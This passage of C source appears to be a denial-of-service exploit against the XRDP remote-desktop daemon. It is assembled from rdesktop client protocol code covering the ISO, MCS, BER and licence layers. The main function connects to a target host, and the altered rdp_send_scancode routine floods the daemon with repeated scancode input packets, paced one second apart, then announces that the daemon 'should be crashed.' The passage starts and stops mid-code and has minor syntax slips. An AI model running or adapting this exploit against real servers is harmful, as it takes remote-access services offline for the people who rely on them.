uint8 data[MAX_DATA]; + +} +POLYLINE_ORDER; + +typedef struct _DESTBLT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + +} +DESTBLT_ORDER; + +typedef struct _PATBLT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint8 bgcolour; + uint8 fgcolour; + BRUSH brush; + +} +PATBLT_ORDER; + +typedef struct _SCREENBLT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint16 srcx; + uint16 srcy; + +} +SCREENBLT_ORDER; + +typedef struct _LINE_ORDER +{ + uint16 mixmode; + uint16 startx; + uint16 starty; + uint16 endx; + uint16 endy; + uint8 bgcolour; + uint8 opcode; + PEN pen; + +} +LINE_ORDER; + +typedef struct _RECT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 colour; + +} +RECT_ORDER; + +typedef struct _DESKSAVE_ORDER +{ + uint32 offset; + uint16 left; + uint16 top; + uint16 right; + uint16 bottom; + uint8 action; + +} +DESKSAVE_ORDER; + +typedef struct _MEMBLT_ORDER +{ + uint8 colour_table; + uint8 cache_id; + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint16 srcx; + uint16 srcy; + uint16 cache_idx; + +} +MEMBLT_ORDER; + + +typedef struct _TRIBLT_ORDER +{ + uint8 colour_table; + uint8 cache_id; + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint16 srcx; + uint16 srcy; + uint8 bgcolour; + uint8 fgcolour; + BRUSH brush; + uint16 cache_idx; + uint16 unknown; + +} +TRIBLT_ORDER; + +typedef struct _TEXT2_ORDER +{ + uint8 font; + uint8 flags; + uint8 mixmode; + uint8 unknown; + uint8 fgcolour; + uint8 bgcolour; + uint16 clipleft; + uint16 cliptop; + uint16 clipright; + uint16 clipbottom; + uint16 boxleft; + uint16 boxtop; + uint16 boxright; + uint16 boxbottom; + uint16 x; + uint16 y; + uint8 length; + uint8 text[MAX_TEXT]; + +} +TEXT2_ORDER; + +typedef struct _RDP_ORDER_STATE +{ + uint8 order_type; + BOUNDS bounds; + + DESTBLT_ORDER destblt; + PATBLT_ORDER patblt; + SCREENBLT_ORDER screenblt; + LINE_ORDER line; + RECT_ORDER rect; + DESKSAVE_ORDER desksave; + MEMBLT_ORDER memblt; + TRIBLT_ORDER triblt; + POLYLINE_ORDER polyline; + TEXT2_ORDER text2; + +} +RDP_ORDER_STATE; +//End typedefs and structs + + +// Begin XRDP global variables +//mcs.c +uint16 mcs_userid; + +//xkeymap.c +#define KEYMAP_SIZE 0xffff+1 +#define KEYMAP_MASK 0xffff +#define KEYMAP_MAX_LINE_LENGTH 80 +extern Display *display; +extern BOOL enable_compose; +static BOOL keymap_loaded; +static key_translation keymap[KEYMAP_SIZE]; +static int min_keycode; +static uint16 remote_modifier_state = 0; +static void update_modifier_state(uint8 scancode, BOOL pressed); + +//license.c +static uint8 licence_key[16]; +static uint8 licence_sign_key[16]; +BOOL licence_issued = False; + +//rdp.c +extern uint16 mcs_userid; +extern BOOL bitmap_compression; +extern BOOL orders; +extern BOOL encryption; +extern BOOL desktop_save; +uint8 *next_packet; +uint32 rdp_shareid; + +//orders.c +extern uint8 *next_packet; +static RDP_ORDER_STATE order_state; + +//secure.c +extern int width; +extern int height; +extern BOOL encryption; +extern BOOL licence_issued; +static int rc4_key_len; +static RC4_KEY rc4_decrypt_key; +static RC4_KEY rc4_encrypt_key; +static uint8 sec_sign_key[16]; +static uint8 sec_decrypt_key[16]; +static uint8 sec_encrypt_key[16]; +static uint8 sec_decrypt_update_key[16]; +static uint8 sec_encrypt_update_key[16]; +static uint8 sec_crypted_random[SEC_MODULUS_SIZE]; + +//tcp.c +static int sock; +static struct stream in; +static struct stream out; +extern int tcp_port_rdp; + +//xwin.c +static int x_socket; +static int ix = 36; // We force the program to interact + // with X windows as little as possible + // with this counter. +//rdesktop.c +char title[32] = ""; +char username[16]; +char hostname[16]; +char keymapname[16]; +int keylayout = 0x409; +int width = 800; +int height = 600; +int tcp_port_rdp = TCP_PORT_RDP; +BOOL bitmap_compression = True; +BOOL sendmotion = True; +BOOL orders = True; +BOOL encryption = True; +BOOL desktop_save = True; +BOOL fullscreen = False; +BOOL grab_keyboard = True; +BOOL hide_decorations = False; +extern BOOL owncolmap; +// End global variables + + + +//Start function definitions +static BOOL mcs_recv_aucf(uint16 * mcs_userid); +static BOOL mcs_recv_cjcf(void); +static BOOL mcs_recv_connect_response(STREAM mcs_data); +static void rdp_send_synchronise(void); +static void mcs_send_aurq(void); +static void mcs_send_cjrq(uint16 chanid); +static void mcs_send_connect_initial(STREAM mcs_data); +static void mcs_send_edrq(void); +static void process_secondary_order(STREAM s); +static void process_update_pdu(STREAM s); +static STREAM rdp_recv(uint8 * type); +static void rdp_send_control(uint16 action); +static void rdp_send_fonts(uint16 seq); +static void rdp_send_confirm_active(void); +static void reverse(uint8 * p, int len); +STREAM sec_init(uint32 flags, int maxlen); +STREAM sec_recv(void); +STREAM tcp_init(int maxlen); +STREAM tcp_recv(int length); +int ui_select(int rdp_socket); +void * xmalloc(int size); +key_translation xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state); +//End function definitions + + + +int main(int argc, char *argv[]) +{ + char server[64]; + char fullhostname[64]; + char domain[16]; + char password[16]; + char shell[128]; + char directory[32]; + BOOL prompt_password; + struct passwd *pw; + uint32 flags; + char *p; + int c; + int username_option = 0; + encryption = False; + sendmotion = False; + flags = RDP_LOGON_NORMAL; + prompt_password = False; + domain[0] = password[0] = shell[0] = directory[0] = 0; + strcpy(keymapname, "en-us"); + + if (argc == 1) + { + fprintf(stderr, "\n[=] Usage: %s \n\n", argv[0]); + return 0; + } + + strncpy(server, argv[1], sizeof(server)); + if(!rdp_connect(server, flags, domain, password, shell, directory)) + return 0; + + fprintf(stderr, "\n[=] Connected to %s\n", argv[1]); + fprintf(stderr, "[=] Hit CTRL-C if the progress bar stops.\n\n"); + + memset(password, 0, sizeof(password)); + rdp_main_loop(); + fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n"); + return 0; +} + + +void rdp_send_scancode(uint32 time, uint16 flags, uint8 scancode) +{ + update_modifier_state(scancode, !(flags & RDP_KEYRELEASE)); + int c1, c2 = 1; + scancode = '\x1e'; // 0x1e = 0x61 ("A" after parsing. + + fprintf(stderr, "\tBe patient! It takes about a minute, the RDP packets\n"); + fprintf(stderr, "\tneed to be sent spaced apart or the daemon discards them.\n\n"); + fprintf(stderr, "[=] Progress: "); + + for (c1 = 1 ; c1 < 100 ; c1++) + { + for (c2 = 1 ; c2 < 5 ; c2++) + { + //printf("Sending scancode=0x%x, flags=0x%x\n", scancode, flags); + rdp_send_input(time, RDP_INPUT_SCANCODE, flags, scancode, 0); + //scancode++; + } + + fprintf(stderr, "*"); + sleep(1); + } + + fprintf(stderr, "\n[=] The XRDP daemon on target host should be crashed.\n"); + rdp_disconnect(); + exit(1); +} + + +/* Output an ASN.1 BER header */ +static void +ber_out_header(STREAM s, int tagval, int length) +{ + if (tagval > 0xff) + { + out_uint16_be(s, tagval); + } + else + { + out_uint8(s, tagval); + } + + if (length >= 0x80) + { + out_uint8(s, 0x82); + out_uint16_be(s, length); + } + else + out_uint8(s, length); +} + +/* Output an ASN.1 BER integer */ +static void +ber_out_integer(STREAM s, int value) +{ + ber_out_header(s, BER_TAG_INTEGER, 2); + out_uint16_be(s, value); +} + + +/* Parse an ASN.1 BER header */ +static BOOL +ber_parse_header(STREAM s, int tagval, int *length) +{ + int tag, len; + + if (tagval > 0xff) + { + in_uint16_be(s, tag); + } + else + { + in_uint8(s, tag)} + + + if (tag != tagval) + { + error("expected tag %d, got %d\n", tagval, tag); + return False; + } + + + in_uint8(s, len); + + if (len & 0x80) + { + len &= ~0x80; + *length = 0; + while (len--) + next_be(s, *length); + } + else + *length = len; + + return s_check(s); +} + + + +void +ensure_remote_modifiers(uint32 ev_time, key_translation tr) +{ + /* If this key is a modifier, do nothing */ + switch (tr.scancode) + { + case SCANCODE_CHAR_LSHIFT: + case SCANCODE_CHAR_RSHIFT: + case SCANCODE_CHAR_LCTRL: + case SCANCODE_CHAR_RCTRL: + case SCANCODE_CHAR_LALT: + case SCANCODE_CHAR_RALT: + case SCANCODE_CHAR_LWIN: + case SCANCODE_CHAR_RWIN: + case SCANCODE_CHAR_NUMLOCK: + return; + default: + break; + } + + /* Shift. Left shift and right shift are treated as equal; either is fine. */ + if (MASK_HAS_BITS(tr.modifiers, MapShiftMask) + != MASK_HAS_BITS(remote_modifier_state, MapShiftMask)) + { + /* The remote modifier state is not correct */ + if (MASK_HAS_BITS(tr.modifiers, MapLeftShiftMask)) + { + /* Needs left shift. Send down. */ + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LSHIFT); + } + else if (MASK_HAS_BITS(tr.modifiers, MapRightShiftMask)) + { + /* Needs right shift. Send down. */ + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RSHIFT); + } + else + { + /* Should not use this modifier. Send up for shift currently pressed. */ + if (MASK_HAS_BITS(remote_modifier_state, MapLeftShiftMask)) + /* Left shift is down */ + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LSHIFT); + else + /* Right shift is down */ + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RSHIFT); + } + } + + /* AltGr */ + if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask) + != MASK_HAS_BITS(remote_modifier_state, MapAltGrMask)) + { + /* The remote modifier state is not correct */ + if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask)) + { + /* Needs this modifier. Send down. */ + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RALT); + } + else + { + /* Should not use this modifier. Send up. */ + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RALT); + } + } + + /* NumLock */ + if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask) + != MASK_HAS_BITS(remote_modifier_state, MapNumLockMask)) + { + /* The remote modifier state is not correct */ + uint16 new_remote_state = 0; + + if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask)) + { + + new_remote_state |= KBD_FLAG_NUMLOCK; + } + else + { + + } + + rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, new_remote_state, 0); + update_modifier_state(SCANCODE_CHAR_NUMLOCK, True); + } +} + + +#ifdef EGD_SOCKET +/* Read 32 random bytes from PRNGD or EGD socket (based on OpenSSL RAND_egd) */ +static BOOL +generate_random_egd(uint8 * buf) +{ + struct sockaddr_un addr; + BOOL ret = False; + int fd; + + fd = socket(AF_UNIX, SOCK_STREAM, 0); + if (fd == -1) + return False; + + addr.sun_family = AF_UNIX; + memcpy(addr.sun_path, EGD_SOCKET, sizeof(EGD_SOCKET)); + if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + goto err; + + /* PRNGD and EGD use a simple communications protocol */ + buf[0] = 1; /* Non-blocking (similar to /dev/urandom) */ + buf[1] = 32; /* Number of requested random bytes */ + if (write(fd, buf, 2) != 2) + goto err; + + if ((read(fd, buf, 1) != 1) || (buf[0] == 0)) /* Available? */ + goto err; + + if (read(fd, buf, 32) != 32) + goto err; + + ret = True; + + err: + close(fd); + return ret; +} +#endif + + +/* Handles, for example, multi-scancode keypresses (which is not + possible via keymap-files) */ +BOOL +handle_special_keys(uint32 keysym, unsigned int state, uint32 ev_time, BOOL pressed) +{ + switch (keysym) + { + + + case XK_Break: + /* Send Break sequence E0 46 E0 C6 */ + if (pressed) + { + rdp_send_scancode(ev_time, RDP_KEYPRESS, + (SCANCODE_EXTENDED | 0x46)); + rdp_send_scancode(ev_time, RDP_KEYPRESS, + (SCANCODE_EXTENDED | 0xc6)); + } + /* No release sequence */ + return True; + + case XK_Pause: + /* According to MS Keyboard Scan Code + Specification, pressing Pause should result + in E1 1D 45 E1 9D C5. I'm not exactly sure + of how this is supposed to be sent via + RDP. The code below seems to work, but with + the side effect that Left Ctrl stays + down. Therefore, we release it when Pause + is released. */ + if (pressed) + { + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x1d, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x45, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x9d, 0); + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xc5, 0); + } + else + { + /* Release Left Ctrl */ + rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYRELEASE, + 0x1d, 0); + } + return True; + + case XK_Meta_L: /* Windows keys */ + case XK_Super_L: + case XK_Hyper_L: + case XK_Meta_R: + case XK_Super_R: + case XK_Hyper_R: + if (pressed) + { + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LCTRL); + rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_ESC); + } + else + { + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_ESC); + rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LCTRL); + } + return True; + } + return False; +} + + + + + +/* Send a self-contained ISO PDU */ +static void +iso_send_msg(uint8 code) +{ + STREAM s; + + s = tcp_init(11); + + out_uint8(s, 3); /* version */ + out_uint8(s, 0); /* reserved */ + out_uint16_be(s, 11); /* length */ + + out_uint8(s, 6); /* hdrlen */ + out_uint8(s, code); + out_uint16(s, 0); /* dst_ref */ + out_uint16(s, 0); /* src_ref */ + out_uint8(s, 0); /* class */ + + s_mark_end(s); + tcp_send(s); +} + +/* Receive a message on the ISO layer, return code */ +static STREAM +iso_recv_msg(uint8 * code) +{ + STREAM s; + uint16 length; + uint8 version; + + s = tcp_recv(4); + if (s == NULL) + return NULL; + + in_uint8(s, version); + if (version != 3) + { + error("TPKT v%d\n", version); + return NULL; + } + + in_uint8s(s, 1); /* pad */ + in_uint16_be(s, length); + + s = tcp_recv(length - 4); + if (s == NULL) + return NULL; + + in_uint8s(s, 1); /* hdrlen */ + in_uint8(s, *code); + + if (*code == ISO_PDU_DT) + { + in_uint8s(s, 1); /* eot */ + return s; + } + + in_uint8s(s, 5); /* dst_ref, src_ref, class */ + return s; +} + +/* Initialise ISO transport data packet */ +STREAM +iso_init(int length) +{ + STREAM s; + + s = tcp_init(length + 7); + s_push_layer(s, iso_hdr, 7); + + return s; +} + +/* Send an ISO data PDU */ +void +iso_send(STREAM s) +{ + uint16 length; + + s_pop_layer(s, iso_hdr); + length = s->end - s->p; + + out_uint8(s, 3); /* version */ + out_uint8(s, 0); /* reserved */ + out_uint16_be(s, length); + + out_uint8(s, 2); /* hdrlen */ + out_uint8(s, ISO_PDU_DT); /* code */ + out_uint8(s, 0x80); /* eot */ + + tcp_send(s); +} + +/* Receive ISO transport data packet */ +STREAM +iso_recv(void) +{ + STREAM s; + uint8 code; + + s = iso_recv_msg(&code); + if (s == NULL) + return NULL; + + if (code != ISO_PDU_DT) + { + error("expected DT, got 0x%x\n", code); + return NULL; + } + + return s; +} + +/* Establish a connection up to the ISO layer */ +BOOL +iso_connect(char *server) +{ + uint8 code; + + if (!tcp_connect(server)) + return False; + + iso_send_msg(ISO_PDU_CR); + + if (iso_recv_msg(&code) == NULL) + return False; + + if (code != ISO_PDU_CC) + { + error("expected CC, got 0x%x\n", code); + tcp_disconnect(); + return False; + } + + return True; +} + +/* Disconnect from the ISO layer */ +void +iso_disconnect(void) +{ + iso_send_msg(ISO_PDU_DR); + tcp_disconnect(); +} + + + +/* Generate a session key and RC4 keys, given client and server randoms */ +static void +licence_generate_keys(uint8 * client_key, uint8 * server_key, uint8 * client_rsa) +{ + uint8 session_key[48]; + uint8 temp_hash[48]; + + /* Generate session key - two rounds of sec_hash_48 */ + sec_hash_48(temp_hash, client_rsa, client_key, server_key, 65); + sec_hash_48(session_key, temp_hash, server_key, client_key, 65); + + /* Store first 16 bytes of session key, for generating signatures */ + memcpy(licence_sign_key, session_key, 16); + + /* Generate RC4 key */ + sec_hash_16(licence_key, &session_key[16], client_key, server_key); +} + + + +/* Send a licence request packet */ +static void +licence_send_request(uint8 * client_random, uint8 * rsa_data, char *user, char *host) +{ + uint32 sec_flags = SEC_LICENCE_NEG; + uint16 userlen = strlen(user) + 1; + uint16 hostlen = strlen(host) + 1; + uint16 length = 128 + userlen + hostlen; + STREAM s; + + s = sec_init(sec_flags, length + 2); + + out_uint16_le(s, LICENCE_TAG_REQUEST); + out_uint16_le(s, length); + + out_uint32_le(s, 1); + out_uint16(s, 0); + out_uint16_le(s, 0xff01); + + out_uint8p(s, client_random, SEC_RANDOM_SIZE); + out_uint16(s, 0); + out_uint16_le(s, (SEC_MODULUS_SIZE + SEC_PADDING_SIZE)); + out_uint8p(s, rsa_data, SEC_MODULUS_SIZE); + out_uint8s(s, SEC_PADDING_SIZE); + + out_uint16(s, LICENCE_TAG_USER); + out_uint16(s, userlen); + out_uint8p(s, user, userlen); + + out_uint16(s, LICENCE_TAG_HOST); + out_uint16(s, hostlen); + out_uint8p(s, host, hostlen); + + s_mark_end(s); + sec_send(s, sec_flags); +} + +/* Process a licence demand packet */ +static void +licence_process_demand(STREAM s) +{ + uint8 null_data[SEC_MODULUS_SIZE]; + uint8 *server_random; +#ifdef SAVE_LICENCE + uint8 signature[LICENCE_SIGNATURE_SIZE]; + uint8 hwid[LICENCE_HWID_SIZE]; + uint8 *licence_data; + int licence_size; + RC4_KEY crypt_key; +#endif + + /* Retrieve the server random from the incoming packet */ + in_uint8p(s, server_random, SEC_RANDOM_SIZE); + + /* We currently use null client keys. This is a bit naughty but, hey, + the security of licence negotiation isn't exactly paramount. */ + memset(null_data, 0, sizeof(null_data)); + licence_generate_keys(null_data, server_random, null_data); + +#ifdef SAVE_LICENCE + licence_size = load_licence(&licence_data); + if (licence_size != -1) + { + /* Generate a signature for the HWID buffer */ + licence_generate_hwid(hwid); + sec_sign(signature, 16, licence_sign_key, 16, hwid, sizeof(hwid)); + + /* Now encrypt the HWID */ + RC4_set_key(&crypt_key, 16, licence_key); + RC4(&crypt_key, sizeof(hwid), hwid, hwid); + + licence_present(null_data, null_data, licence_data, licence_size, hwid, signature); + xfree(licence_data); + return; + } +#endif + + licence_send_request(null_data, null_data, username, hostname); +} + + +/* Process a licence packet */ +void +licence_process(STREAM s) +{ + uint16 tag; + + in_uint16_le(s, tag); + in_uint8s(s, 2); /* length */ + + switch (tag) + { + case LICENCE_TAG_DEMAND: + + licence_process_demand(s); + break; + + case LICENCE_TAG_AUTHREQ: +// licence_process_authreq(s); + break; + + case LICENCE_TAG_ISSUE: +// licence_process_issue(s); + break; + + case LICENCE_TAG_REISSUE: + break; + + case LICENCE_TAG_RESULT: + break; + + + } +} + + +/* Establish a connection up to the MCS layer */ +BOOL +mcs_connect(char *server, STREAM mcs_data) +{ + if (!iso_connect(server)) + return False; + + mcs_send_connect_initial(mcs_data); + if (!mcs_recv_connect_response(mcs_data)) + goto error; + + mcs_send_edrq(); + + mcs_send_aurq(); + if (!mcs_recv_aucf(&mcs_userid)) + goto error; + + mcs_send_cjrq(mcs_userid + 1001); + if (!mcs_recv_cjcf()) + goto error; + + mcs_send_cjrq(MCS_GLOBAL_CHANNEL); + if (!mcs_recv_cjcf()) + goto error; + + return True; + + error: + iso_disconnect(); + return False; +} + +/* Disconnect from the MCS layer */ +void +mcs_disconnect(void) +{ + iso_disconnect(); +} + + + +/* Initialise an MCS transport data packet */ +STREAM +mcs_init(int length) +{ + STREAM s; + + s = iso_init(length + 8); + s_push_layer(s, mcs_hdr, 8); + + return s; +} + + +/* Output a DOMAIN_PARAMS structure (ASN.1 BER) */ +static void +mcs_out_domain_params(STREAM s, int max_channels, int max_users, int max_tokens, int max_pdusize) +{ + ber_out_header(s, MCS_TAG_DOMAIN_PARAMS, 32); + ber_out_integer(s, max_channels); + ber_out_integer(s, max_users); + ber_out_integer(s, max_tokens); + ber_out_integer(s, 1); /* num_priorities */ + ber_out_integer(s, 0); /* min_throughput */ + ber_out_integer(s, 1); /* max_height */ + ber_out_integer(s, max_pdusize); + ber_out_integer(s, 2); /* ver_protocol */ +} + + + + +/* Receive an MCS transport data packet */ +STREAM +mcs_recv(void) +{ + uint8 opcode, appid, length; + STREAM s; + + s = iso_recv(); + if (s == NULL) + return NULL; + + in_uint8(s, opcode); + appid = opcode >> 2; + if (appid != MCS_SDIN) + { + if (appid != MCS_DPUM) + { + error("expected data, got %d\n", opcode); + } + return NULL; + } + + in_uint8s(s, 5); /* userid, chanid, flags */ + in_uint8(s, length); + if (length & 0x80) + in_uint8s(s, 1); /* second byte of length */ + + return s; +} + + + +/* Expect a AUcf message (ASN.1 PER) */ +static BOOL +mcs_recv_aucf(uint16 * mcs_userid) +{ + uint8 opcode, result; + STREAM s; + + s = iso_recv(); + if (s == NULL) + return False; + + in_uint8(s, opcode); + if ((opcode >> 2) != MCS_AUCF) + { + error("expected AUcf, got %d\n", opcode); + return False; + } + + in_uint8(s, result); + if (result != 0) + { + error("AUrq: %d\n", result); + return False; + } + + if (opcode & 2) + in_uint16_be(s, *mcs_userid); + + return s_check_end(s); +} + + +/* Expect a CJcf message (ASN.1 PER) */ +static BOOL +mcs_recv_cjcf(void) +{ + uint8 opcode, result; + STREAM s; + + s = iso_recv(); + if (s == NULL) + return False; + + in_uint8(s, opcode); + if ((opcode >> 2) != MCS_CJCF) + { + error("expected CJcf, got %d\n", opcode); + return False; + } + + in_uint8(s, result); + if (result != 0) + { + error("CJrq: %d\n", result); + return False; + } + + in_uint8s(s, 4); /* mcs_userid, req_chanid */ + if (opcode & 2) + in_uint8s(s, 2); /* join_chanid */ + + return s_check_end(s); +} + + +/* Parse a DOMAIN_PARAMS structure (ASN.1 BER) */ +static BOOL +mcs_parse_domain_params(STREAM s) +{ + int length; + + ber_parse_header(s, MCS_TAG_DOMAIN_PARAMS, &length); + in_uint8s(s, length); + + return s_check(s); +} + + +/* Expect a MCS_CONNECT_RESPONSE message (ASN.1 BER) */ +static BOOL +mcs_recv_connect_response(STREAM mcs_data) +{ + uint8 result; + int length; + STREAM s; + + s = iso_recv(); + if (s == NULL) + return False; + + ber_parse_header(s, MCS_CONNECT_RESPONSE, &length); + + ber_parse_header(s, BER_TAG_RESULT, &length); + in_uint8(s, result); + if (result != 0) + { + error("MCS connect: %d\n", result); + return False; + } + + ber_parse_header(s, BER_TAG_INTEGER, &length); + in_uint8s(s, length); /* connect id */ + + mcs_parse_domain_params(s); + + ber_parse_header(s, BER_TAG_OCTET_STRING, &length); + if (length > mcs_data->size) + { + error("MCS data length %d\n", length); + length = mcs_data->size; + } + + in_uint8a(s, mcs_data->data, length); + mcs_data->p = mcs_data->data; + mcs_data->end = mcs_data->data + length; + + return s_check_end(s); +} + + +/* Send an MCS transport data packet */ +void +mcs_send(STREAM s) +{ + uint16 length; + + s_pop_layer(s, mcs_hdr); + length = s->end - s->p - 8; + length |= 0x8000; + + out_uint8(s, (MCS_SDRQ << 2)); + out_uint16_be(s, mcs_userid); + out_uint16_be(s, MCS_GLOBAL_CHANNEL); + out_uint8(s, 0x70); /* flags */ + out_uint16_be(s, length); + + iso_send(s); +} + + +/* Send an AUrq message (ASN.1 PER) */ +static void +mcs_send_aurq(void) +{ + STREAM s; + + s = iso_init(1); + + out_uint8(s, (MCS_AURQ << 2)); + + s_mark_end(s); + iso_send(s); +} + + +/* Send a CJrq message (ASN.1 PER) */ +static void +mcs_send_cjrq(uint16 chanid) +{ + STREAM s; + + s = iso_init(5); + + out_uint8(s, (MCS_CJRQ << 2)); + out_uint16_be(s, mcs_userid); + out_uint16_be(s, chanid); + + s_mark_end(s); + iso_send(s); +} + + +/* Send an MCS_CONNECT_INITIAL message (ASN.1 BER) */ +static void +mcs_send_connect_initial(STREAM mcs_data) +{ + int datalen = mcs_data->end - mcs_data->data; + int length = 7 + 3 * 34 + 4 + datalen; + STREAM s; + + s = iso_init(length + 5); + + ber_out_header(s, MCS_CONNECT_INITIAL, length); + ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* calling domain */ + ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* called domain */ + + ber_out_header(s, BER_TAG_BOOLEAN, 1); + out_uint8(s, 0xff); /* upward flag */ + + mcs_out_domain_params(s, 2, 2, 0, 0xffff); /* target params */ + mcs_out_domain_params(s, 1, 1, 1, 0x420); /* min params */ + mcs_out_domain_params(s, 0xffff, 0xfc17, 0xffff, 0xffff); /* max params */ + + ber_out_header(s, BER_TAG_OCTET_STRING, datalen); + out_uint8p(s, mcs_data->data, datalen); + + s_mark_end(s); + iso_send(s); +} + + +/* Send an EDrq message (ASN.1 PER) */ +static void +mcs_send_edrq(void) +{ + STREAM s; + + s = iso_init(5); + + out_uint8(s, (MCS_EDRQ << 2)); + out_uint16_be(s, 1); /* height */ + out_uint16_be(s, 1); /* interval */ + + s_mark_end(s); + iso_send(s); +} + + +/* Process data PDU */ +static void +process_data_pdu(STREAM s) +{ + uint8 data_pdu_type; + + in_uint8s(s, 8); /* shareid, pad, streamid, length */ + in_uint8(s, data_pdu_type); + in_uint8s(s, 3); /* compress_type, compress_len */ + + switch (data_pdu_type) + { + case RDP_DATA_PDU_UPDATE: + process_update_pdu(s); + break; + + case RDP_DATA_PDU_POINTER: + //process_pointer_pdu(s); + break; + + case RDP_DATA_PDU_BELL: + //ui_bell(); + break; + + case RDP_DATA_PDU_LOGON: + /* User logged on */ + break; + + } +} + + +/* Respond to a demand active PDU */ +static void +process_demand_active(STREAM s) +{ + uint8 type; + + in_uint32_le(s, rdp_shareid); + + + + rdp_send_confirm_active(); + rdp_send_synchronise(); + rdp_send_control(RDP_CTL_COOPERATE); + rdp_send_control(RDP_CTL_REQUEST_CONTROL); + rdp_recv(&type); /* RDP_PDU_SYNCHRONIZE */ + rdp_recv(&type); /* RDP_CTL_COOPERATE */ + rdp_recv(&type); /* RDP_CTL_GRANT_CONTROL */ + rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, 0, 0); + rdp_send_fonts(1); + rdp_send_fonts(2); + rdp_recv(&type); /* RDP_PDU_UNKNOWN 0x28 */ + reset_order_state(); +} + + +/* Process an order PDU */ +void +process_orders(STREAM s) +{ + RDP_ORDER_STATE *os = &order_state; + uint32 present; + uint16 num_orders; + uint8 order_flags; + int size, processed = 0; + BOOL delta; + + in_uint8s(s, 2); /* pad */ + in_uint16_le(s, num_orders); + in_uint8s(s, 2); /* pad */ + + while (processed < num_orders) + { + in_uint8(s, order_flags); + + if (!(order_flags & RDP_ORDER_STANDARD)) + { + error("order parsing failed\n"); + break; + } + + if (order_flags & RDP_ORDER_SECONDARY) + { + process_secondary_order(s); + } + else + { + if (order_flags & RDP_ORDER_CHANGE) + { + in_uint8(s, os->order_type); + } + + switch (os->order_type) + { + case RDP_ORDER_TRIBLT: + case RDP_ORDER_TEXT2: + size = 3; + break; + + case RDP_ORDER_PATBLT: + case RDP_ORDER_MEMBLT: + case RDP_ORDER_LINE: + size = 2; + break; + + default: + size = 1; + } + + + delta = order_flags & RDP_ORDER_DELTA; + + } + processed++; + } + + if (s->p != next_packet) + error("%d bytes remaining\n", (int) (next_packet - s->p)); +} + + +/* Process a secondary order */ +static void +process_secondary_order(STREAM s) +{ + uint16 length; + uint8 type; + uint8 *next_order; + + in_uint16_le(s, length); + in_uint8s(s, 2); /* flags */ + in_uint8(s, type); + next_order = s->p + length + 7; + s->p = next_order; +} + + +/* Process an update PDU */ +static void +process_update_pdu(STREAM s) +{ + uint16 update_type; + + in_uint16_le(s, update_type); + + switch (update_type) + { + case RDP_UPDATE_ORDERS: + process_orders(s); + break; + + case RDP_UPDATE_SYNCHRONIZE: + break; + } +} + + +/* Initialise an RDP packet */ +static STREAM +rdp_init(int maxlen) +{ + STREAM s; + + s = sec_init(encryption ? SEC_ENCRYPT : 0, maxlen + 6); + s_push_layer(s, rdp_hdr, 6); + + return s; +} + +/* Send an RDP packet */ +static void +rdp_send(STREAM s, uint8 pdu_type) +{ + uint16 length; + + s_pop_layer(s, rdp_hdr); + length = s->end - s->p; + + out_uint16_le(s, length); + out_uint16_le(s, (pdu_type | 0x10)); /* Version 1 */ + out_uint16_le(s, (mcs_userid + 1001)); + + sec_send(s, encryption ? SEC_ENCRYPT : 0); +} + +/* Receive an RDP packet */ +static STREAM +rdp_recv(uint8 * type) +{ + static STREAM rdp_s; + uint16 length, pdu_type; + + if ((rdp_s == NULL) || (next_packet >= rdp_s->end)) + { + rdp_s = sec_recv(); + if (rdp_s == NULL) + return NULL; + + next_packet = rdp_s->p; + } + else + { + rdp_s->p = next_packet; + } + + in_uint16_le(rdp_s, length); + /* 32k packets are really 8, keepalive fix */ + if (length == 0x8000) + { + next_packet += 8; + *type = 0; + return rdp_s; + } + in_uint16_le(rdp_s, pdu_type); + in_uint8s(rdp_s, 2); /* userid */ + *type = pdu_type & 0xf; + + + next_packet += length; + return rdp_s; +} + +/* Initialise an RDP data packet */ +static STREAM +rdp_init_data(int maxlen) +{ + STREAM s; + + s = sec_init(encryption ? SEC_ENCRYPT : 0, maxlen + 18); + s_push_layer(s, rdp_hdr, 18); + + return s; +} + +/* Send an RDP data packet */ +static void +rdp_send_data(STREAM s, uint8 data_pdu_type) +{ + uint16 length; + + s_pop_layer(s, rdp_hdr); + length = s->end - s->p; 